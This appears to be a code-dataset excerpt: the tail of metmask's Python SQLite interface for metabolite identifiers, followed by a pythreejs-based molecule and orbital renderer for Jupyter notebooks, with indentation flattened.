self.dropPreferred(_id)
for tab in un.getTables():
for ide in un.getIdentifiers(tab):
try:
conf = un.getConfidence(tab, ide)
src = un.getSource(tab, ide)
ass = un.getAssoc(tab, ide)
if len(conf) != len(src) or len(conf) <= 0 or len(src) <= 0:
raise dbError('confidence and source not defined or not of equal length')
for i in range(0, len(conf)):
self.insertToMask(tab, _id, str(ide), conf[i], src[i], ass=ass[i])
except sqlite3.IntegrityError as inst:
raise
return (1)
def fixPreferred(self, un):
""" make sure that the preferred string is present and not
available in the preferred table.
Parameters:
-`un` : a mask
"""
if not un.hasTable('_id'):
raise dbError("get an _id before fixing the preferred")
if un.hasTable('preferred'):
self.c.execute("SELECT _id FROM preferred WHERE preferred = :pref", \
{'pref': un.getIdentifiers('preferred')[0]})
checkOk = [x[0] == un.getIdentifiers('_id')[0] for x in self.c.fetchall()]
if all(checkOk):
return (1)
else:
un.delTable('preferred')
self.fixPreferred(un)
if not un.hasTable('preferred'):
if un.hasTable('synonym'):
if un.getIdentifiers('synonym', weak=False):
pref = un.getIdentifiers('synonym', weak=False)[0]
else:
pref = un.getIdentifiers('synonym')[0]
so = un.getSource('synonym', pref)[0]
cn = un.getConfidence('synonym', pref)[0]
else:
pref = un.getIdentifiers(un.getTables()[0])[0]
so = un.getSource(un.getTables()[0], pref)[0]
cn = un.getConfidence(un.getTables()[0], pref)[0]
# this was meant to it recognizable if pref was
# auto-generated but it also conteracts the purpose of
# pref as it the string becomes longer
# pref = 'mm:' + pref
pref = str(un.getIdentifiers('_id')[0]) + ':' + str(pref) # make pref unique
un.append('preferred', pref, cn, so)
self.fixPreferred(un)
def dropIdentifiers(self, un):
""" drop all identifiers in the current mask. (Not the same as
dropMask which deletes a single whole mask)
Parameters:
-`un` : a mask object containign the identifiers to drop.
"""
tables = un.getTables()
for tab in tables:
identifiers = un.getIdentifiers(tab)
for ide in identifiers:
st1 = "DELETE FROM " + tab + " WHERE " + tab + " = :ide"
try:
self.c.execute(st1, {'ide': str(ide)})
except sqlite3.OperationalError as inst:
raise inst
def dropMask(self, un):
""" drop all information related to this mask. Warning: annotations
are kept. Make sure they are updated after deletion if necessary.
Parameters:
- `un`: instance of mask.mask
"""
mmids = self.getMmid(un)
if not mmids:
raise dbError('no such mask')
tables = self.getIdTables()
for mm in mmids:
for tab in tables:
st1 = "DELETE FROM " + tab + " WHERE _id = :mm"
try:
self.c.execute(st1, {'mm': str(mm)})
except sqlite3.OperationalError as inst:
raise inst
def simpleQuery(self, name, what='_id', to='_id',
external=True, learn=True, weak=True, outmask=False, wildcards=False):
""" Query the database for a single or set of identifiers. Return a
vector of masks. Or the empty vector if not hits were found.
Parameters :
- `name`, the identifier(s) eiher as a string or list of strings.
- `what`, the type of the identifier, if a list each identifier
is interpreted as potentially one of each
- `to`, string indicating the desired return type. Either return a mask or the
desired table
- `external`, logical, should try internet if the database
didn't have the desired identifier
- `weak`, logical, should we return weak identifiers as well
- `outmask`, logical, should we return a mask or formatted list
"""
if not weak:
weak = False
originalTo = to
un = mask({})
# make sure that inputs are proper lists
if to[0] == 'ALL':
to = self.getIdTables(weak)
if re.match("~", to[0]):
to = [x for x in self.getIdTables(weak) if x not in [x.replace("~", "") for x in to]]
if not isinstance(to, list):
to = [to]
if not isinstance(what, list):
what = [what]
if not isinstance(name, list):
name = [name]
# populate the mask
for w in what:
for n in name:
un.append(w, n)
default = [[[] for x in range(0, len(to))]]
reqWeak = [x for x in to if x in self.getWeakTables()]
if any([x in self.getWeakTables() for x in what]):
weak = True
# if any asked table is weak but 'weak=False' then first get
# masks without weak, then with weak and add the weak tables.
# search the db
try:
masks = self.getMask(un, weak=weak, wildcards=wildcards)
# if no hits but we were not asked to search for weak
# identifiers, try weak anyway
if len(masks) == 0 and not external and not weak:
masks = self.getMask(un, weak=True, wildcards=wildcards)
if len(masks) > 0 and not weak and reqWeak:
weak_masks = self.getMask(un, True, wildcards=wildcards)
for m in masks:
for w in weak_masks:
if m.getIdentifiers("_id")[0] == w.getIdentifiers("_id")[0]:
for r in reqWeak:
if w.hasTable(r) and not m.hasTable(r):
m.copyTable(w, r)
except NameError:
return (default)
# found tables
found = [x.hasTable(to) for x in masks]
# generator for
def iden(tab, mzk):
for t in tab:
yield [ma.getIdentifiers(t) for ma in mzk][0]
# make sure we do not query for something we do not know how to find
if not any([x in query.KNOWNTABLES for x in to]):
external = False
# either found or explicitly told not to go online
# if all(found) and found or not external or all([masks, to[0] == 'mask']):
if all(found) and found or not external:
if outmask:
for ma in masks:
for tab in ma.getTables():
if not tab in to:
ma.delTable(tab)
return (masks)
else:
if masks:
answer = []
for ma in masks:
answer.append(list(iden(to, [ma])))
return (answer)
else:
return (default)
# attach original search mask as well incase we had nothing
# in the db
masks.append(un)
resmasks = []
i = 1
for ma in masks:
if self.debug:
print("#COMMENT No hit, trying external resources..", end=' ')
externalMask = query.fetch(self, ma, internal=len(masks) > 1, to=to)
if not externalMask:
if self.debug:
print("no hit, giving up")
continue
if self.debug:
print("found it! ")
if learn:
if self.debug:
print("#COMMENT adding the information")
list(map(self.createIdTable, externalMask.getTables()))
self.setMask(externalMask)
resmasks.append(externalMask)
if i == len(masks) - 1:
break
i = i + 1
# return what we got
if to[0] == 'mask':
return (resmasks)
else:
answer = []
for ma in resmasks:
answer.append(list(iden(to, [ma])))
return (answer)
def getAllMmids(self):
"""
get all _ids
"""
# get all _id
self.c.execute('SELECT _id FROM _id')
return ([x[0] for x in self.c.fetchall()])
def export(self, tables, weak=False):
"""print all contents of the given tables to stdout
Parameters:
- `tables`: a list with the desired tables
"""
mmids = self.getAllMmids()
if tables[0] == "ALL":
tables = self.getIdTables()
if any([x in self.getWeakTables() for x in tables]):
weak = True
# print header
tmp = "\"" + "\",\"".join(tables) + "\""
print(tmp)
for mm in mmids:
ma = mask({})
ma.append('_id', mm)
ma = self.getMask(ma, weak=weak)[0]
if any([x in tables for x in ma.getTables()]):
i = 0
# one mask one row
for tab in tables:
i = i + 1
if ma.hasTable(tab):
ide = ma.getIdentifiers(tab)
ide = list(map(str, ide))
tmp = "\"" + "\"|\"".join(ide) + "\""
sys.stdout.write(tmp)
if i != len(tables):
sys.stdout.write(",")
# row is finished
sys.stdout.write('\n')
def stats(self, more=False):
""" print out basic statistics about the current database
"""
try:
tabs = self.getIdTables()
print("metmask db@" + self.db)
print("Known identifiers:")
for t in tabs:
self.c.execute("SELECT count(distinct " + t + ") FROM " + t)
lines = [x[0] for x in self.c.fetchall()]
print(t + ":")
print(str(lines) + " rows")
if more:
self.c.execute("SELECT * FROM sources")
print("Sources:")
print('%-5s %-10s' % ('Code', 'Name'))
tmp = self.c.fetchall()
for t in tmp:
print('%-5s %-10s' % (str(t[0]), str(t[1])))
self.c.execute("SELECT * FROM confidence")
print("Confidence codes:")
print('%-5s %-15s' % ('Code', 'Name'))
tmp = self.c.fetchall()
for t in tmp:
print('%-5s %-15s' % (str(t[0]), str(t[1])))
except:
raise dbError("Could not perform a simple select statement")
|
kozo2/metmask
|
metmask/dbi.py
|
Python
|
gpl-3.0
| 39,416
|
[
"Bioconductor"
] |
643c55e74b738dae1d8d4c57f1d0102595c472d5681fc7f51390a8a2428f8a74
|
import math
import re
import collections
import numpy as np
import skimage.measure
from IPython.display import display
from pythreejs import *
from .atom_data import *
from collections import defaultdict
def rgb2hex(r, g, b):
r = max(0, min(r, 255))
g = max(0, min(g, 255))
b = max(0, min(b, 255))
return '#%02x%02x%02x' % (r, g, b)
def xyz_to_atoms_list(xyz):
"""
Converts an xyz geometry to a list of the form
Parameters
----------
xyz : str
An xyz geometry where each entry has the format "<atom symbol> <x> <y> <z>".
Any comment will be ignored
Returns
-------
A list(tuple(str, float, float, float)) containing the atomic symbol and coordinates of the atom.
"""
atoms_list = []
re_xyz = re.compile(
r"(\w+)\s+([-+]?[0-9]*\.?[0-9]+)\s+([-+]?[0-9]*\.?[0-9]+)\s+([-+]?[0-9]*\.?[0-9]+)"
)
for line in xyz.split('\n'):
m = re.search(re_xyz, line)
if (m):
symbol, x, y, z = m.groups()
atoms_list.append((symbol, float(x), float(y), float(z)))
return atoms_list
class Py3JSRenderer():
"""
A lightweight molecule and orbital renderer
Attributes
----------
bond_color : color
color of the bonds
bond_radius : float
the radius of the bonds
name : str
the name of the animal
sound : str
the sound that the animal makes
num_legs : int
the number of legs the animal has (default 4)
Methods
-------
display()
Display the pythreejs renderer
renderer()
Return the pythreejs renderer
add_molecule(atoms_list, bohr=False, shift_to_com=True)
Add a molecule specified by a list of (symbol,x,y,z) tuples
add_molecule_xyz(xyz, bohr=False, shift_to_com=True)
Add a molecule specified in xyz format
add_cubefile(cube,type='mo',levels=None,colors=None,colorscheme=None,opacity=1.0,scale=1.0,sumlevel=0.85,add_geom=True,shift_to_com=True)
Add a cube file
add_cubefiles(cubes,type='mo',levels=None,colors=None,colorscheme=None,opacity=1.0,scale=1.0,sumlevel=0.85,add_geom=True,shift_to_com=True)
Add a cube file
add_sphere(self, position, radius, color, opacity=1.0)
Add a sphere (should not be used to draw molecules)
add_cylinder(self, xyz1, xyz2, color, radius)
Add a cylinder (should not be used to draw molecules)
add_arrow(xyz1,xyz2,color,radius_small=0.1,radius_large=0.3,arrow_height=0.6)
Add an arrow between two points
add_plane(position,color,plane=None,normal=(0.0, 0.0, 1.0),type='circle',width=4,height=4,opacity=1.0)
Add a plane
def add_box(position,width,height,depth,color,opacity=1.0,normal=(0, 0, 1))
Add a box
"""
def __init__(self, width=400, height=400):
"""
Class initialization function
Parameters
----------
width : int
The width of the scene in pixels (default = 400)
height : int
The height of the scene in pixels (default = 400)
"""
self.width = width
self.height = height
# aspect ratio
self.aspect = float(self.width) / float(self.height)
self.bond_radius = 0.15 #0.2 # a.u.
self.bond_color = '#777777'
self.angtobohr = 1.88973 # TODO: use Psi4's value
self.atom_size = 0.5 # scaling factor for atom geometry
self.atom_geometries = {}
self.atom_materials = {}
self.bond_materials = {}
self.bond_geometry = None
# cubefile meshes
self.cube_meshes = defaultdict(list)
# a list of active cubefile meshes
self.active_cube_meshes = []
# normal mode meshes
self.normal_modes_meshes = []
# the active normal mode
self.active_normal_mode = None
# set an initial scene size
self.camera_width = 10.0
self.camera_height = self.camera_width / self.aspect
self._color_schemes = {
'national': ['#e60000', '#0033a0'],
'bright': ['#ffcc00', '#00bfff'],
'electron': ['#ff00bf', '#2eb82e'],
'wow': ['#AC07F2', '#D7F205'],
'emory': ['#f2a900', '#0033a0']
}
self.__initialize_pythreejs_renderer()
def display(self):
"""
Display this renderer
"""
display(self.renderer)
def renderer(self):
"""
Return the Renderer object
"""
return self.renderer
def cubes(self):
"""
Return the list of cube
"""
return list(self.cube_meshes.keys())
def set_active_cubes(self, active_cubes):
"""
Set the active cubes
"""
# let the user pass a string or a list of strings
if isinstance(active_cubes, str):
active_cubes = [active_cubes]
# find cubes that must be removed (those plotted not included in the new list)
to_remove = set(self.active_cube_meshes).difference(set(active_cubes))
to_add = set(active_cubes).difference(set(self.active_cube_meshes))
self.active_cube_meshes = active_cubes
for cube in to_add:
if cube in self.cube_meshes:
for mesh in self.cube_meshes[cube]:
self.scene.add(mesh)
# remove/add
for cube in to_remove:
if cube in self.cube_meshes:
for mesh in self.cube_meshes[
cube]: # each cube has multiple meshes
self.scene.remove(mesh)
def set_active_mode(self, active_mode):
"""
Set the active cubes
"""
# let the user pass a string or a list of strings
# if isinstance(active_mode, int):
# active_cubes = [active_cubes]
# find cubes that must be removed (those plotted not included in the new list)
# to_remove = set(self.active_cube_meshes).difference(set(active_cubes))
# to_add = set(active_cubes).difference(set(self.active_cube_meshes))
# self.active_cube_meshes = active_cubes
self.scene.add(self.normal_modes_meshes[active_mode])
if self.active_normal_mode != None:
self.scene.remove(self.normal_modes_meshes[self.active_normal_mode])
self.active_normal_mode = active_mode
def show_molecule(self, wfn, shift_to_com=True):
mol = wfn.molecule()
natom = mol.natom()
atoms_list = [(mol.symbol(i), mol.x(i), mol.y(i), mol.z(i))
for i in range(natom)]
self.add_molecule(atoms_list, bohr=True)
def add_molecule(self, atoms_list, bohr=False, shift_to_com=True):
"""
Add a molecular geometry to the scene. The geometry is given as a list of atoms
symbols and xyz coordinates
Parameters
----------
atoms_list : list(tuple(str, float, float, float))
A list of tuples containing the atomic symbol and coordinates of the atom using the format
(atomic symbol,x,y,z)
bohr : bool
Are the coordinate in units of bohr? (default = False)
scale : float
Scale factor to change the size of the scene (default = 1.0)
shift_to_com : bool
Shift the molecule so that the center of mass is at the origin (default = True)
"""
if bohr == False:
atoms_list2 = []
for atom in atoms_list:
symbol, x, y, z = atom
new_atom = (symbol, self.angtobohr * x, self.angtobohr * y,
self.angtobohr * z)
atoms_list2.append(new_atom)
atoms_list = atoms_list2
self.molecule = Group()
# Add the atoms
# Performance optimization using CloneArray
# First find all the atoms of the same type
if shift_to_com:
Xcm, Ycm, Zcm = self.__center_of_mass(atoms_list)
else:
Xcm, Ycm, Zcm = (0.0, 0.0, 0.0)
atom_positions = collections.defaultdict(list)
for symbol, x, y, z in atoms_list:
atom_positions[symbol].append([x - Xcm, y - Ycm, z - Zcm])
# Then add the unique atoms at all the positions
for atom_type in atom_positions:
atom_mesh = self.__get_atom_mesh((atom_type, 0.0, 0.0, 0.0))
clone_geom = CloneArray(original=atom_mesh,
positions=atom_positions[atom_type])
self.scene.add(clone_geom)
# Add the bonds
for i in range(len(atoms_list)):
atom1 = atoms_list[i]
for j in range(i + 1, len(atoms_list)):
atom2 = atoms_list[j]
bond = self.__get_bond_mesh(atom1, atom2)
if bond:
self.scene.add(bond)
return self.renderer
def add_molecule_xyz(self, xyz, bohr=False, shift_to_com=True):
"""
Add a molecular geometry in xyz format to the scene
Parameters
----------
xyz : str
An xyz geometry where each entry has the format "<atom symbol> <x> <y> <z>".
Any comment will be ignored
bohr : bool
Are the coordinate in units of bohr? (default = False)
scale : float
Scale factor to change the size of the scene (default = 1.0)
shift_to_com : bool
Shift the molecule so that the center of mass is at the origin (default = True)
"""
atoms_list = xyz_to_atoms_list(xyz)
self.add_molecule(atoms_list, bohr, scale)
def add_cubefile(self,
cube,
type='mo',
levels=None,
colors=None,
colorscheme=None,
opacity=1.0,
scale=1.0,
sumlevel=0.85,
add_geom=True,
shift_to_com=True):
"""
Add a cube file (and optionally the molecular geometry) to the scene. This function will automatically select the levels and colors
with which to plot the surfaces
Parameters
----------
cube : CubeFile
A CubeFile object
type : str
The type of cube file ('mo' or 'density')
levels : list(float)
The levels to plot (default = None). If not provided, levels will be automatically selected
using the compute_levels() function of the CubeFile class. The variable sumlevel is used to
select the levels
color : list(str)
The color of each surface passed as a list of hexadecimal color codes (default = None)
colorscheme : str
A predefined color scheme (default = 'emory'). Possible options are ['emory', 'national', 'bright', 'electron', 'wow']
opacity : float
Opacity of the surfaces (default = 1.0)
scale : float
Scale factor to change the size of the scene (default = 1.0)
sumlevel : float
Cumulative electron density threshold used to find the isosurface levels
add_geom : bool
Show the molecular geometry (default = True)
shift_to_com : bool
Shift the molecule so that the center of mass is at the origin (default = True)
"""
Xcm, Ycm, Zcm = (0.0, 0.0, 0.0)
if shift_to_com or add_geom:
atoms_list = []
for Z, xyz in zip(cube.atom_numbers(), cube.atom_coords()):
symbol = ATOM_DATA[Z]['symbol']
atoms_list.append((symbol, xyz[0], xyz[1], xyz[2]))
# compute the center of mass
Xcm, Ycm, Zcm = self.__center_of_mass(atoms_list)
if add_geom:
self.add_molecule(atoms_list,
bohr=True,
shift_to_com=shift_to_com)
# compute the isosurface levels
if not levels:
levels = cube.compute_levels(type, sumlevel)
# select the color scheme
if colorscheme == 'national':
colors = ['#e60000', '#0033a0']
elif colorscheme == 'bright':
colors = ['#ffcc00', '#00bfff']
elif colorscheme == 'electron':
colors = ['#ff00bf', '#2eb82e']
elif colorscheme == 'wow':
colors = ['#AC07F2', '#D7F205']
elif colors == None or colorscheme == 'emory':
colors = ['#f2a900', '#0033a0']
# grab the data and extents, shift to the center of mass automatically
data = cube.data()
extent = [[cube.min()[0] - Xcm,
cube.max()[0] - Xcm],
[cube.min()[1] - Ycm,
cube.max()[1] - Ycm],
[cube.min()[2] - Zcm,
cube.max()[2] - Zcm]]
for level, color in zip(levels, colors):
if abs(level) > 1.0e-4:
mesh = self.__isosurface_mesh(data,
level=level,
color=color,
extent=extent,
opacity=opacity)
self.scene.add(mesh)
def add_cubefiles(self,
cubes,
type='mo',
levels=None,
colors=None,
colorscheme='emory',
opacity=1.0,
sumlevel=0.85,
add_geom=True,
shift_to_com=True,
show_surfaces=False):
"""
Add a cube file (and optionally the molecular geometry) to the scene. This function will automatically select the levels and colors
with which to plot the surfaces
Parameters
----------
cubes : dict(str -> CubeFile)
The CubeFile objects to load
type : str
The type of cube files ('mo' or 'density')
levels : list(float)
The levels to plot (default = None). If not provided, levels will be automatically selected
using the compute_levels() function of the CubeFile class. The variable sumlevel is used to
select the levels
color : list(str)
The color of each surface passed as a list of hexadecimal color codes (default = None)
colorscheme : str
A predefined color scheme (default = 'emory'). Possible options are ['emory', 'national', 'bright', 'electron', 'wow']
opacity : float
Opacity of the surfaces (default = 1.0)
sumlevel : float
Cumulative electron density threshold used to find the isosurface levels
add_geom : bool
Show the molecular geometry (default = True)
shift_to_com : bool
Shift the molecule so that the center of mass is at the origin (default = True)
"""
if len(cubes) == 0:
return
Xcm, Ycm, Zcm = (0.0, 0.0, 0.0)
cube = cubes[list(cubes)[0]]
atoms_list = []
for Z, xyz in zip(cube.atom_numbers(), cube.atom_coords()):
symbol = ATOM_DATA[Z]['symbol']
atoms_list.append((symbol, xyz[0], xyz[1], xyz[2]))
if add_geom:
# compute the center of mass
self.add_molecule(atoms_list, bohr=True, shift_to_com=shift_to_com)
if shift_to_com:
Xcm, Ycm, Zcm = self.__center_of_mass(atoms_list)
# grab the color scheme
if colors == None:
colors = self._color_schemes[colorscheme]
# process the cube files
for label, cube in cubes.items():
# check if we alredy have this cube file
if label in self.cube_meshes:
continue
# generate a mesh
self.cube_meshes[label] = self.__cube_mesh(cube, type, levels,
sumlevel, colors,
opacity, Xcm, Ycm, Zcm)
if show_surfaces:
self.scene.add(mesh)
self.active_cube_meshes.append(mesh)
def add_normal_modes(self,
coordinates,
frequencies,
modes):
for freq, mode in zip(frequencies,modes):
self.normal_modes_meshes.append(self.__normal_mode_mesh(coordinates,mode))
def __cube_mesh(self, cube, type, levels, sumlevel, colors, opacity, Xcm,
Ycm, Zcm):
meshes = []
# compute the isosurface levels
if not levels:
levels = cube.compute_levels(type, sumlevel)
# grab the data and extents, shift to the center of mass automatically
data = cube.data()
extent = [[cube.min()[0] - Xcm,
cube.max()[0] - Xcm],
[cube.min()[1] - Ycm,
cube.max()[1] - Ycm],
[cube.min()[2] - Zcm,
cube.max()[2] - Zcm]]
for level, color in zip(levels, colors):
if abs(level) > 1.0e-5:
mesh = self.__isosurface_mesh(data,
level=level,
color=color,
extent=extent,
opacity=opacity)
meshes.append(mesh)
return meshes
def __normal_mode_mesh(self, coordinates, mode):
meshes = []
for xyz,disp in zip(coordinates,mode):
norm = 0.0
for d in disp:
norm += d**2
if norm != 0.0:
xyz1 = [xyz[i + 1] for i in range(3)]
xyz2 = [xyz1[i] + 2.5 * disp[i] for i in range(3)]
arrow_meshes = self.__get_arrow_mesh(xyz1,xyz2,'#e60000',radius_small=0.25,radius_large=0.5)
for mesh in arrow_meshes:
meshes.append(mesh)
return meshes
def add_sphere(self, position, radius, color, opacity=1.0):
"""
This function adds a sphere
This should not be used to draw molecules because it cannot efficiently
handle mutiple copied of the same object
Parameters
----------
position : tuple(float, float, float)
The (x, y, z) coordinates of the center of the sphere
radius : float
The sphere radius
color : str
Hexadecimal color code
opacity : float
The opacity of the sphere (default = 1.0)
"""
geometry = SphereGeometry(radius=radius,
widthSegments=24,
heightSegments=24)
material = MeshStandardMaterial(color=color,
roughness=0.0,
metalness=0.0,
side='DoubleSide',
transparent=True,
opacity=opacity)
mesh = Mesh(geometry=geometry, material=material, position=position)
self.scene.add(mesh)
def add_cylinder(self, xyz1, xyz2, color, radius):
"""
This function adds a cylinder/cone between two points
This should not be used to draw molecules.
Parameters
----------
xyz1 : tuple(float, float, float)
The (x1, y1, z1) coordinates of the beginning of the cylinder
xyz2 : tuple(float, float, float)
The (x2, y2, z2) coordinates of the end of the cylinder
color : str
Hexadecimal color code
radius : float, (float,float), or [float,float]
The radius of the cylinder. If a float is passed then the cylinder is
assumed to have constant radius. If a list/tuple is passed the two numbers
correspond to the radius at points 1 and 2. This is useful to draw cones
"""
if isinstance(radius, float):
mesh = self.__get_cylinder_mesh(xyz1, xyz2, radius, radius, color)
self.scene.add(mesh)
elif isinstance(radius, (list, tuple)):
if len(radius) == 2:
mesh = self.__get_cylinder_mesh(xyz1, xyz2, radius[0],
radius[1], color)
self.scene.add(mesh)
else:
print(
f'add_cylinder(): radius (= {radius}) must be either a float or a list/tuple with two elements'
)
def add_arrow(self,
xyz1,
xyz2,
color,
radius_small=0.1,
radius_large=0.3,
arrow_height=0.6):
"""
This function adds an arrow between two points
Parameters
----------
xyz1 : tuple(float, float, float)
The (x1, y1, z1) coordinates of the beginning of the arrow
xyz2 : tuple(float, float, float)
The (x2, y2, z2) coordinates of the end of the arrow
color : str
Hexadecimal color code
radius_small : float
The radius of the arrow tail
radius_large : float
The radius of the base of the arrow cone
arrow_height : float
The height of the arrow cone
"""
x1, y1, z1 = xyz1
x2, y2, z2 = xyz2
d = sqrt((x1 - x2)**2 + (y1 - y2)**2 + (z1 - z2)**2)
fraction = (d - arrow_height) / d
xyz_base = [
x1 + (x2 - x1) * fraction, y1 + (y2 - y1) * fraction,
z1 + (z2 - z1) * fraction
]
mesh = self.__get_cylinder_mesh(xyz1, xyz_base, radius_small,
radius_small, color)
self.scene.add([mesh])
mesh = self.__get_cylinder_mesh(xyz_base, xyz2, radius_large, 0.0,
color)
self.scene.add([mesh])
def add_plane(self,
position,
color,
plane=None,
normal=(0.0, 0.0, 1.0),
type='circle',
width=4,
height=4,
opacity=1.0):
"""
This function adds a plane centered at a given position. The type of plane
can be specified either via a vector perpendicular to the plane or by selecting
one of the planes that lies on two Cartesian axes
Parameters
----------
position : tuple(float, float, float)
The (x, y, z) coordinates of the center of the plane
plane : str
The type of plane ('xy', 'xz', 'yz') (default = None). This overrides the `normal` argument
normal : tuple(float, float, float)
A vector (x, y, z) to which the plane is orthogonal (default = (0,0,1))
color : str
Hexadecimal color code
type : str
The type of plane ('circle', 'square') (default = 'circle')
width : float
The width (radius) of the plane (default = 4.0)
height : float
The height of the plane (default = 4.0)
opacity : float
The opacity of the plane (default = 1.0)
"""
if type == 'square':
geometry = PlaneGeometry(width=width,
height=height,
widthSegments=10,
heightSegments=10)
else:
geometry = CircleGeometry(radius=width / 2, segments=48)
material = MeshStandardMaterial(color=color,
roughness=0.3,
metalness=0.0,
side='DoubleSide',
transparent=True,
opacity=opacity)
mesh = Mesh(geometry=geometry, material=material, position=position)
if plane == 'xy' or plane == 'yx':
normal = (0.0, 0.0, 1.0)
elif plane == 'xz' or plane == 'zx':
normal = (0.0, 1.0, 0.0)
elif plane == 'yz' or plane == 'zy':
normal = (1.0, 0.0, 0.0)
# If the plane is not rotated skip the rotation step
if normal[2] != 1.0 or normal[2] != -1.0:
R = self.__plane_rotation_matrix(normal)
mesh.setRotationFromMatrix(R)
self.scene.add(mesh)
def add_box(self,
position,
width,
height,
depth,
color,
opacity=1.0,
normal=(0, 0, 1)):
"""
This function adds a box centered at a given position. The orientation of the
box is specified via a vector perpendicular to the plane spanned by the width and height.
Parameters
----------
position : tuple(float, float, float)
The (x, y, z) coordinates of the center of the plane
width : float
The width (x dimension) of the box
height : float
The height (y dimension) of the box
depth : float
The depth (z dimension) of the box
color : str
Hexadecimal color code
opacity : float
The opacity of the box (default = 1.0)
normal : tuple(float, float, float)
A vector (x, y, z) to which the plane is orthogonal (default = (0,0,1))
"""
geometry = BoxGeometry(width=width,
height=height,
depth=depth,
widthSegments=10,
heightSegments=10,
depthSegments=10)
material = MeshStandardMaterial(color=color,
roughness=0.3,
metalness=0.0,
side='DoubleSide',
transparent=True,
opacity=opacity)
mesh = Mesh(geometry=geometry, material=material, position=position)
# If the bond rotation is 180 deg then return
R = self.__plane_rotation_matrix(normal)
mesh.setRotationFromMatrix(R)
self.scene.add(mesh)
def __initialize_pythreejs_renderer(self):
"""
Create a pythreejs Scene and a Camera and add them to a Renderer
"""
# create a Scene
self.scene = Scene()
# create a camera
self.camera = OrthographicCamera(
left=-self.camera_width / 2,
right=self.camera_width / 2,
top=self.camera_height / 2,
bottom=-self.camera_height / 2,
position=[0, 0, self.camera_height * 2.0],
up=[0, 1, 0],
children=[
DirectionalLight(color='white',
position=[5, 5, 1],
intensity=0.5)
],
near=.1,
far=1000)
# add the camera and some ambiend light to the scene
self.scene.add([self.camera, AmbientLight(color='#999999')])
self.renderer = Renderer(
camera=self.camera,
scene=self.scene,
controls=[OrbitControls(controlling=self.camera)],
width=self.width,
height=self.height)
def __get_atom_mesh(self, atom_info):
"""
This function returns a Mesh object (Geometry + Material) that represents an atom
Parameters
----------
atom_info : tuple(str, float, float, float)
A tuple containing the atomic symbol and coordinates of the atom using the format
(atomic symbol , x, y, z)
"""
symbol, x, y, z = atom_info
geometry = self.__get_atom_geometry(symbol)
material = self.__get_atom_material(symbol)
mesh = Mesh(geometry=geometry, material=material, position=[x, y, z])
return mesh
def __get_atom_geometry(self, symbol, shininess=75):
"""
This function returns a sphere geometry object with radius proportional to the covalent atomic radius
Parameters
----------
symbol : str
The symbol of the atom (e.g. 'Li')
shininess : int
The shininess of the sphere (default = 75)
"""
if symbol in self.atom_geometries:
return self.atom_geometries[symbol]
atom_data = ATOM_DATA[ATOM_SYMBOL_TO_Z[symbol]]
radius_covalent = atom_data['radius_covalent'] * self.angtobohr
geometry = SphereGeometry(radius=self.atom_size * radius_covalent,
widthSegments=24,
heightSegments=24)
self.atom_geometries[symbol] = geometry
return geometry
def __get_atom_material(self, symbol, shininess=75):
"""
This function returns a Material object used to draw atoms
Parameters
----------
symbol : str
The symbol of the atom (e.g. 'Li')
shininess : int
The shininess of the material (default = 75)
"""
if symbol in self.atom_materials:
return self.atom_materials[symbol]
atom_data = ATOM_DATA[ATOM_SYMBOL_TO_Z[symbol]]
color = 'rgb({0[0]},{0[1]},{0[2]})'.format(atom_data['color'])
# material = MeshPhongMaterial(color=color, shininess=shininess)
material = MeshStandardMaterial(color=color,
roughness=0.25,
metalness=0.1)
self.atom_materials[symbol] = material
return material
def __get_bond_mesh(self, atom1_info, atom2_info, radius=None):
"""
This function adds a bond between two atoms
atoms 1 and 2
Parameters
----------
xyz1 : tuple(float, float, float)
The (x1, y1, z1) coordinates of the beginning of the arrow
xyz2 : tuple(float, float, float)
The (x2, y2, z2) coordinates of the end of the arrow
color : str
Hexadecimal color code
radius_small : float
The radius of the arrow
radius_large : float
The radius of the arrow
"""
symbol1, x1, y1, z1 = atom1_info
symbol2, x2, y2, z2 = atom2_info
d = sqrt((x1 - x2)**2 + (y1 - y2)**2 + (z1 - z2)**2)
radius_covalent1 = ATOM_DATA[
ATOM_SYMBOL_TO_Z[symbol1]]['radius_covalent']
radius_covalent2 = ATOM_DATA[
ATOM_SYMBOL_TO_Z[symbol2]]['radius_covalent']
bond_cutoff = self.bond_cutoff(radius_covalent1, radius_covalent2)
if d > bond_cutoff:
return None
if radius == None:
radius = self.bond_radius
d = sqrt((x1 - x2)**2 + (y1 - y2)**2 + (z1 - z2)**2)
position = [(x2 + x1) / 2, (y2 + y1) / 2, (z2 + z1) / 2]
geometry = self.__get_bond_geometry()
material = self.__get_bond_material(color=self.bond_color)
mesh = Mesh(geometry=geometry, material=material, position=position)
mesh.scale = (1, d, 1)
# If the bond rotation is 180 deg then return
if y1 - y2 == d:
mesh.rotateX(3.14159265359) #math.pi)
return mesh
R = self.__cylinder_rotation_matrix([x1, y1, z1], [x2, y2, z2])
mesh.setRotationFromMatrix(R)
return mesh
def __get_bond_geometry(self):
"""
This function returns a cylinder geometry object of unit height used to draw bonds
"""
if self.bond_geometry:
return self.bond_geometry
self.bond_geometry = CylinderGeometry(radiusTop=self.bond_radius,
radiusBottom=self.bond_radius,
height=1,
radialSegments=12,
heightSegments=6,
openEnded=False)
return self.bond_geometry
def __get_bond_material(self, color, shininess=75):
"""
This function returns a Material object used to draw bonds
Parameters
----------
color : str
Hexadecimal color code
shininess : int
The shininess of the material (default = 75)
"""
if color in self.bond_materials:
return self.bond_materials[color]
material = MeshStandardMaterial(color=color,
roughness=0.25,
metalness=0.1)
self.bond_materials[color] = material
return material
def __get_cylinder_mesh(self, xyz1, xyz2, radius1, radius2, color):
"""
This function returns a Mesh object (Geometry + Material) that represents a bond between
atoms 1 and 2
Parameters
----------
xyz1 : tuple(float, float, float)
The (x1, y1, z1) coordinates of atom 1
xyz2 : tuple(float, float, float)
The (x2, y2, z2) coordinates of atom 2
radius1 : float
The radius of the bond at atom 1
radius2 : float
The radius of the bond at atom 2
color : str
Hexadecimal color code
"""
radius1 = max(0.01, radius1)
radius2 = max(0.01, radius2)
x1, y1, z1 = xyz1
x2, y2, z2 = xyz2
d = sqrt((x1 - x2)**2 + (y1 - y2)**2 + (z1 - z2)**2)
position = [(x2 + x1) / 2, (y2 + y1) / 2, (z2 + z1) / 2]
geometry = CylinderGeometry(radiusTop=radius2,
radiusBottom=radius1,
height=d,
radialSegments=12,
heightSegments=6,
openEnded=False)
material = MeshPhongMaterial(color=color, shininess=100)
mesh = Mesh(geometry=geometry, material=material, position=position)
# If the bond rotation is 180 deg then return
if y1 - y2 == d:
mesh.rotateX(3.14159265359)
return mesh
R = self.__cylinder_rotation_matrix(xyz1, xyz2)
mesh.setRotationFromMatrix(R)
return mesh
